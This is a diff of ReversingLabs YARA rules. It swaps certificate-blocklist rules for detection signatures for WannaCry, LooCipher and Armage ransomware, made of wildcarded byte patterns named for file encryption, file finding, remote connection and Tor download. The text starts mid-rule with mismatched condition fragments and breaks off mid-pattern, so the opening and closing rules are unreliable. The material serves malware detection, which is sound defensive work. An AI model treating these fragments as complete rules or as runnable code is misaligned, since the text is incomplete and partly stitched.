?? ?? 11 ?? 11 ?? 16 11 + ?? 8E 69 6F ?? ?? ?? ?? 25 13 ?? 16 30 ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC 09 + 2C ?? 09 6F ?? ?? ?? ?? DC 08 2C ?? 08 6F ?? ?? ?? ?? DC 03 28 ?? ?? ?? ?? 2A + } condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "CHOO FSP, LLC" and pe.signatures[i].serial=="03:96:68:03:48:26:df:47:e6:20:7e:c9:da:ed:57:c3" and 1601424001<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ( all of ($find_files_p*)) and ( all of ($encrypt_files_p*)) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_07Bb6A9D1C642C5973C16D5353B17Ca4 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Wannacry : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects WannaCry ransomware." author = "ReversingLabs" - id = "094a02ee-394b-5989-9f73-6b942aca5500" - date = "2023-11-08" - modified = "2023-11-08" + id = "61734d47-2525-5e3a-94b4-60493dfe2b93" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L5770-L5786" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "b98dcd4f0ebe870a9dad55cac5b0db81be6062216337b75a74a0aff8436df57f" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.WannaCry.yara#L3-L135" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "fed58b533a9f7c3eb1b3e4f8fbe1f519aab94d1c066ae6937c21876693be0eac" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "WannaCry" + tc_detection_factor = 5 importance = 25 - condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "MADAS d.o.o." and pe.signatures[i].serial=="07:bb:6a:9d:1c:64:2c:59:73:c1:6d:53:53:b1:7c:a4" and 1601856001<=pe.signatures[i].not_after) -} -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_0A1Dc99E4D5264C45A5090F93242A30A : INFO FILE -{ - meta: - description = "Certificate used for digitally signing malware." - author = "ReversingLabs" - id = "9b85ed8d-ddda-51d0-bfac-5cdc6e4fd94f" - date = "2023-11-08" - modified = "2023-11-08" - reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L5788-L5804" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "1985c9c4f4a93c3088eaec3031df93cf87a9d7ee36b94322330caf3c21982f3c" - score = 75 - quality = 90 - tags = "INFO, FILE" - status = "RELEASED" - sharing = "TLP:WHITE" - category = "INFO" - importance = 25 + strings: + $main_1 = { + A0 ?? ?? ?? ?? 56 57 6A ?? 88 85 ?? ?? ?? ?? 59 33 C0 8D BD ?? ?? ?? ?? F3 AB 66 AB + AA 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8D 85 + ?? ?? ?? ?? 6A ?? 50 FF D6 59 85 C0 59 74 ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 FF D6 59 88 + 18 59 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 59 59 + 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 53 53 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 5F 5E 85 + C0 74 ?? 8D 45 ?? 8D 8D ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 89 5D + } + $main_2 = { + 68 ?? ?? ?? ?? 33 DB 50 53 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 FF 15 + ?? ?? ?? ?? 83 38 ?? 75 ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 00 FF 70 ?? E8 ?? ?? + ?? ?? 59 85 C0 59 75 ?? 53 E8 ?? ?? ?? ?? 85 C0 59 74 ?? BE ?? ?? ?? ?? 53 8D 85 ?? + ?? ?? ?? 56 50 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 83 F8 ?? 74 ?? E8 ?? ?? ?? ?? + 85 C0 0F 85 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 FF D6 59 85 C0 + 59 74 ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 FF D6 59 88 18 59 8D 85 ?? ?? ?? ?? 50 FF 15 ?? + ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? + 53 53 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 53 68 ?? ?? ?? ?? E8 + } + $main_3 = { + 83 EC ?? 56 57 B9 ?? ?? ?? ?? BE ?? ?? ?? ?? 8D 7C 24 ?? 33 C0 F3 A5 A4 89 44 24 ?? + 89 44 24 ?? 89 44 24 ?? 89 44 24 ?? 89 44 24 ?? 66 89 44 24 ?? 50 50 50 6A ?? 50 88 + 44 24 ?? FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 8D 4C 24 ?? 8B F0 6A ?? 51 56 + FF 15 ?? ?? ?? ?? 8B F8 56 8B 35 ?? ?? ?? ?? 85 FF 75 ?? FF D6 6A ?? FF D6 E8 + } + $start_service_3 = { + 83 EC ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 + 38 ?? 7D ?? E8 ?? ?? ?? ?? 83 C4 ?? C3 57 68 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? + ?? 8B F8 85 FF 74 ?? 53 56 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 8B 1D + ?? ?? ?? ?? 8B F0 85 F6 74 ?? 6A ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 56 FF D3 57 FF D3 5E + 5B 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 50 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? + ?? ?? C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 5F 83 C4 ?? C3 + } + $main_4 = { + 83 EC ?? 57 68 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F8 85 FF 74 ?? 53 56 68 + ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8B F0 85 F6 74 ?? + 6A ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 56 FF D3 57 FF D3 5E 5B 8D 44 24 ?? C7 44 24 ?? ?? + ?? ?? ?? 50 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? + FF 15 ?? ?? ?? ?? 33 C0 5F 83 C4 ?? C2 + } + $main_5 = { + 68 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 + FF D6 59 85 C0 59 74 ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 FF D6 59 88 18 59 8D 85 ?? ?? ?? + ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 59 59 8D 8D ?? ?? ?? ?? E8 + ?? ?? ?? ?? 53 53 53 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 5F 5E 85 C0 74 ?? 8D 45 ?? 8D + 8D ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 89 5D ?? E8 ?? ?? ?? ?? 3B C3 74 ?? FF 75 ?? 50 E8 + ?? ?? ?? ?? 59 3B C3 59 74 ?? 68 ?? ?? ?? ?? 50 E8 + } + $main_6 = { + FF 74 24 ?? FF 74 24 ?? FF 74 24 ?? FF 74 24 ?? E8 ?? ?? ?? ?? C2 + } + $set_reg_key_6 = { + 68 ?? ?? ?? ?? F3 AB 66 AB AA 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 50 FF 15 ?? ?? ?? + ?? 8B 2D ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 83 C4 ?? 33 FF 89 7C 24 ?? 85 FF 75 ?? 8D 4C + 24 ?? 8D 54 24 ?? 51 52 68 ?? ?? ?? ?? EB ?? 8D 44 24 ?? 8D 4C 24 ?? 50 51 68 ?? ?? + ?? ?? FF 15 ?? ?? ?? ?? 8B 44 24 ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 85 + C9 74 ?? 8D 94 24 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? FF D5 8D BC 24 ?? ?? ?? ?? 83 C9 ?? + 33 C0 F2 AE F7 D1 8D 84 24 ?? ?? ?? ?? 51 8B 4C 24 ?? 50 6A ?? 6A ?? 68 ?? ?? ?? ?? + 51 FF D3 8B 7C 24 ?? 8B F0 F7 DE 1B F6 46 EB ?? 8D 54 24 ?? 8D 8C 24 ?? ?? ?? ?? 52 + 51 6A ?? 6A ?? 68 ?? ?? ?? ?? 50 C7 44 24 ?? ?? ?? ?? ?? FF 15 + } + $download_tor_6 = { + 81 EC ?? ?? ?? ?? 53 55 56 57 E8 ?? ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? A0 ?? ?? ?? ?? + B9 ?? ?? ?? ?? 88 44 24 ?? 33 C0 8D 7C 24 ?? 8B 35 ?? ?? ?? ?? F3 AB 68 ?? ?? ?? ?? + 68 ?? ?? ?? ?? 66 AB 68 ?? ?? ?? ?? 8D 4C 24 ?? 33 ED 68 ?? ?? ?? ?? 51 89 2D ?? ?? + ?? ?? 89 2D ?? ?? ?? ?? AA FF D6 8B 1D ?? ?? ?? ?? 83 C4 ?? 8D 54 24 ?? 52 FF D3 83 + F8 ?? 0F 85 ?? ?? ?? ?? 55 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 84 + C0 75 ?? 5F 5E 5D 5B 81 C4 ?? ?? ?? ?? C3 A0 ?? ?? ?? ?? B9 ?? ?? ?? ?? 88 84 24 ?? + ?? ?? ?? 33 C0 8D BC 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? F3 AB 66 AB 68 ?? ?? ?? ?? 68 ?? + ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 AA FF D6 83 C4 ?? 8D 94 24 ?? ?? ?? + ?? 52 FF D3 83 F8 ?? 75 ?? 5F 5E 5D 32 C0 5B 81 C4 ?? ?? ?? ?? C3 + } + $main_7 = { + 68 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 + FF D6 59 85 C0 59 74 ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 FF D6 59 88 18 59 8D 85 ?? ?? ?? + ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 59 59 8D 8D ?? ?? ?? ?? E8 + ?? ?? ?? ?? 53 53 53 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 5F 5E 85 C0 74 ?? 8D 45 ?? 8D + 8D ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 53 8F 45 ?? E8 ?? ?? ?? ?? 39 44 24 ?? 74 ?? 89 44 + 24 ?? 83 EC ?? 2B C3 58 74 ?? FF 75 ?? 50 E8 ?? ?? ?? ?? 59 89 44 24 ?? 83 EC ?? 2B + C3 58 59 74 ?? 68 ?? ?? ?? ?? 50 E8 + } + $main_8 = { + 68 ?? ?? ?? ?? F3 AB 66 AB AA 8D 44 24 ?? 50 6A ?? FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? + ?? 8D 4C 24 ?? 6A ?? 51 FF D6 83 C4 ?? 85 C0 74 ?? 8D 54 24 ?? 6A ?? 52 FF D6 83 C4 + ?? C6 00 ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 8C 24 + ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 5F + 5E 85 C0 74 ?? 8D 4C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 51 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? + ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 54 24 ?? 52 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 + ?? 68 ?? ?? ?? ?? 50 E8 + } + $entrypoint_all = { + 55 8B EC 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? + ?? 83 EC ?? 53 56 57 89 65 ?? 33 DB 89 5D ?? 6A ?? FF 15 ?? ?? ?? ?? 59 83 0D ?? ?? + ?? ?? ?? 83 0D ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 89 08 FF 15 ?? ?? + ?? ?? 8B 0D ?? ?? ?? ?? 89 08 A1 ?? ?? ?? ?? 8B 00 A3 ?? ?? ?? ?? E8 ?? ?? ?? ?? 39 + 1D ?? ?? ?? ?? 75 ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 59 E8 ?? ?? ?? ?? 68 ?? ?? ?? + ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 89 45 ?? 8D 45 ?? 50 FF 35 ?? ?? ?? + ?? 8D 45 ?? 50 8D 45 ?? 50 8D 45 ?? 50 FF 15 + } condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "K & D KOMPANI d.o.o." and pe.signatures[i].serial=="0a:1d:c9:9e:4d:52:64:c4:5a:50:90:f9:32:42:a3:0a" and 1600905601<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($entrypoint_all at pe.entry_point) and ($main_1 or $main_2 or ($main_3 and $start_service_3) or $main_4 or $main_5 or ($main_6 and ($set_reg_key_6 or $download_tor_6)) or $main_7 or $main_8) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_018093Cfad72Cdf402Eecbe18B33Ec71 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Loocipher : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects LooCipher ransomware." author = "ReversingLabs" - id = "d9ab2e5c-a107-53c1-9b8d-b4625eed03b0" - date = "2023-11-08" - modified = "2023-11-08" + id = "b5aa2bd0-72b0-5013-a60e-9b4f1ee1de1f" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L5806-L5822" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "ac398ef89e691158742598777c320832a750a7410904448778afc7ef3c63c255" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.LooCipher.yara#L1-L87" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "aa0598d63b5fad6aea0945a0aa2030d3d6e2cd9f1fea16f3dd17cdceb68323e3" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "LooCipher" + tc_detection_factor = 5 importance = 25 + strings: + $remote_connection = { + 6A ?? 83 EC ?? 8B CC 89 A5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 8D ?? + ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? + ?? ?? E8 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 B9 ?? ?? + ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? + ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? + 50 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 68 ?? ?? + ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? + ?? ?? E8 ?? ?? ?? ?? 50 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 50 8D 85 ?? ?? + ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 50 + 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? + 83 C4 ?? 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? + ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? + ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? + ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? + ?? E8 + } + $encrypt_files = { + 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? 53 56 57 8D BD + ?? ?? ?? ?? B9 ?? ?? ?? ?? B8 ?? ?? ?? ?? F3 AB A1 ?? ?? ?? ?? 33 C5 89 45 ?? 50 8D + 45 ?? 64 A3 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? + 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? + ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 0F B7 4D ?? 3B C1 74 + ?? E8 ?? ?? ?? ?? 8B F0 8D 4D ?? E8 ?? ?? ?? ?? 8B C8 83 E9 ?? 8B C6 33 D2 F7 F1 89 + 55 ?? 6A ?? 8B 45 ?? 50 8D 8D ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? + ?? 8B 95 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? C6 45 ?? ?? 8B 85 ?? ?? ?? ?? 50 8D 4D ?? E8 + ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ?? 8D 45 ?? 50 8B 4D ?? + E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 83 C9 ?? 89 8D ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? E8 + ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B 45 ?? 52 8B CD 50 8D 15 + ?? ?? ?? ?? E8 ?? ?? ?? ?? 58 5A 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? + 33 CD E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? 3B EC E8 ?? ?? ?? ?? 8B E5 5D C3 + } + $find_files = { + 52 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 8D ?? ?? + ?? ?? E8 ?? ?? ?? ?? 0F B6 85 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? B9 + ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 0F B6 C0 85 C0 0F 84 ?? ?? ?? + ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? + ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 + ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 8B F4 89 + A5 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 8D 8D ?? ?? ?? ?? E8 ?? + ?? ?? ?? 8B 50 ?? 52 8B 00 50 8B CE E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C6 45 ?? ?? B9 + ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 6A ?? 8D 8D ?? ?? ?? ?? 51 C6 45 ?? ?? E8 ?? ?? ?? ?? + 83 C4 ?? 89 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 + B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? + 68 ?? ?? ?? ?? 6A ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? EB ?? 83 EC ?? 8B CC + 89 A5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? B9 ?? ?? ?? + ?? E8 ?? ?? ?? ?? 50 6A ?? 8D 85 ?? ?? ?? ?? 50 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? + 83 C4 ?? 89 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 + B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? + ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 8D + ?? ?? ?? ?? 89 8D ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 B9 ?? ?? ?? + ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? EB + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "FAT11 d.o.o." and pe.signatures[i].serial=="01:80:93:cf:ad:72:cd:f4:02:ee:cb:e1:8b:33:ec:71" and 1602000390<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($find_files) and ($encrypt_files) and ($remote_connection) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_569E03988Af60D80Ce60728940850D9B : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Armage : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Armage ransomware." author = "ReversingLabs" - id = "a4432990-8c2f-523c-8a9d-cba578aaefc5" - date = "2023-11-08" - modified = "2023-11-08" + id = "94cf639b-7d9e-51ca-b547-e0d591581df2" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L5824-L5842" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "3ea894d9e088c2123f9ec87cbf097e2275fae18cad26e926641fe64921808b1e" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Armage.yara#L1-L128" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "aa8ddcbb0fdcad15e603e000db1d4f86eae7d42efce1c1d21dc3dd57ee9f4319" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Armage" + tc_detection_factor = 5 importance = 25 + strings: + $encrypt_files_p1 = { + 55 89 E5 53 8D 5D ?? 81 EC ?? ?? ?? ?? 89 4D ?? C7 45 ?? ?? ?? ?? ?? 89 5D ?? 8D 5D + ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 89 65 ?? 89 1C 24 E8 ?? ?? ?? ?? 8B 45 + ?? 8D 50 ?? 8D 48 ?? C7 00 ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? C6 40 ?? ?? 89 50 ?? 89 + 95 ?? ?? ?? ?? 8D 50 ?? 89 50 ?? 89 95 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 + ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 8D 5D ?? 83 EC ?? 89 5D ?? + 8B 41 ?? 8B 51 ?? 8D 4D ?? 01 C2 89 04 24 89 54 24 ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? + ?? ?? 8D 45 ?? 8D 5D ?? 83 EC ?? 89 5C 24 ?? 89 04 24 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? + ?? ?? 8B 45 ?? 8D 5D ?? 39 D8 74 ?? 89 04 24 E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 + ?? ?? ?? ?? 8B 55 ?? 8B 4D ?? 89 42 ?? 8B 55 ?? 89 4C 24 ?? 89 04 24 29 CA 89 54 24 + ?? E8 ?? ?? ?? ?? 8B 55 ?? 89 42 ?? 8B 42 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 55 ?? 89 42 + ?? 89 04 24 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 55 ?? + 8B 42 ?? 89 04 24 E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8B 8D ?? + ?? ?? ?? 89 4C 24 ?? 89 85 ?? ?? ?? ?? 89 44 24 ?? 8B 55 ?? 8B 42 ?? 89 04 24 E8 ?? + ?? ?? ?? 8B 8D ?? ?? ?? ?? 89 4C 24 ?? 89 8D ?? ?? ?? ?? 89 4C 24 ?? 8B 85 ?? ?? ?? + ?? 89 44 24 ?? 8B 55 ?? 8B 42 ?? 89 04 24 E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 44 24 + ?? 8B 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 89 5C 24 ?? 8B 8D ?? + ?? ?? ?? 89 4C 24 ?? 89 85 ?? ?? ?? ?? 89 44 24 ?? 8B 55 ?? 8B 42 ?? 89 04 24 E8 ?? + ?? ?? ?? 89 44 24 ?? 8B 85 ?? ?? ?? ?? 89 44 